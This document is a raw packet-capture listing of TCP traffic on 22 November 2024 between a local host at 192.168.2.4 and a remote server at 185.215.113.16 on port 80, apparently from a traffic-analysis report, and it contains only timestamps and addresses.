                                                                                                                                                                                                            Nov 22, 2024 04:26:26.270915031 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.270946026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.271707058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.271749973 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.271814108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.272582054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.272622108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.272902966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.273442030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.273497105 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.273547888 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.274274111 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.274313927 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.274377108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.275168896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.275221109 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.275252104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.276000977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.276070118 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.276113987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.276839018 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.276887894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404254913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404336929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404381037 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404632092 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404747963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.404784918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.405492067 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.405606031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.405657053 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.406337023 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436156988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436198950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436234951 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436566114 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436609030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.436640978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.437448978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.437489033 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.437550068 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.438273907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.438318968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.438551903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.438666105 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.438702106 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.439430952 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.439578056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.439620018 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.440270901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.440403938 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.440444946 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.441135883 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.441188097 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.441231966 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.442030907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.442156076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.442189932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.442984104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.443110943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.443147898 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.443881989 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.443981886 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.444017887 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.444776058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.444900036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.444945097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.445612907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.445744991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.445779085 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.446466923 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.446547031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.446585894 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.447144032 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.447257042 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.447294950 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448003054 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448158026 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448196888 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448848009 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448935986 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.448972940 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.449731112 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.449867964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.449913979 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.450582027 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.450699091 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.450742960 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.451446056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.451548100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.451581955 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.452301979 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.452421904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.452467918 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.453156948 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.453279972 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.453318119 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.454008102 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.454133987 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.454181910 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.454875946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.454971075 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.455008030 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.455717087 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.455822945 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.455861092 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.456600904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.456723928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.456762075 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.457442999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.457556963 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.457595110 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.458312988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.458416939 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.458455086 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.459172964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.459280014 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.459330082 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.460033894 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.460134983 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.460175991 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.460901976 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.461030006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.461067915 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.461791992 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.462013006 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.462054014 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.462629080 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.462749004 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.462790012 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.463484049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.463596106 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.463635921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.464345932 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.464453936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.464497089 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.465169907 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.465286970 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.465323925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.466084003 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.466208935 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.466248989 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.466914892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.467027903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.467068911 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.467756033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.467854977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.467891932 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.468602896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.468717098 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.468769073 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.469485998 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.469629049 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.469671011 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.470330954 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.470460892 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.470496893 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.471200943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.471299887 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.471342087 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.472202063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.472400904 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.472438097 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.472887993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.473005056 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.473042965 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.473757982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.473871946 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.473994017 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.474620104 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.474740982 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.474796057 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.475508928 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.475662947 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.475703001 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.476361036 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.476532936 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.476568937 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.477210999 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.477310896 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.477349043 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.478044033 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.524081945 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.605535030 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.605581045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.605700016 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.605870962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.605979919 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.606028080 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.606722116 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.606837988 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.606873035 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.607557058 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637525082 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637572050 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637584925 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637679100 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637713909 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.637720108 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.638534069 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.638577938 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.638605118 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.639425993 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.639477968 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.639503956 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.640021086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.640058041 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.640069962 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.640898943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.640934944 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.641015053 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.641751051 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.641794920 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.641854048 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.642612934 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.642648935 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.642708063 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.643467903 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.643502951 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.643512011 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.644316912 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.644359112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.644426107 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.645183086 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.645226002 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.645283937 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646047115 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646084070 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646143913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646919966 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646948099 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.646956921 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.647758007 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.647794008 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.647881031 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.648613930 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.648674011 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.648706913 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.649471045 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.649508953 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.649566889 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.650352955 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.650393963 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.650449991 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.651215076 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.651247978 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.651289940 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.652049065 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.652084112 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.652159929 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.652911901 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.652947903 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.653002977 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.653800964 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.653847933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.653879881 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.654649019 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.654690027 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.654732943 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.655529022 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.655565977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.655610085 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.656584978 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.656605005 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.656621933 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.657206059 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.657243967 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.657305002 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.658071995 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.658128977 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.658159971 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.658927917 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.658984900 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.659003973 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.659826994 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.659864902 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.659876108 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.660631895 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.660669088 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.660737038 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.661495924 CET8049744185.215.113.16192.168.2.4
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.661535025 CET4974480192.168.2.4185.215.113.16
                                                                                                                                                                                                            Nov 22, 2024 04:26:26.661571026 CET8049744185.215.113.16192.168.2.4
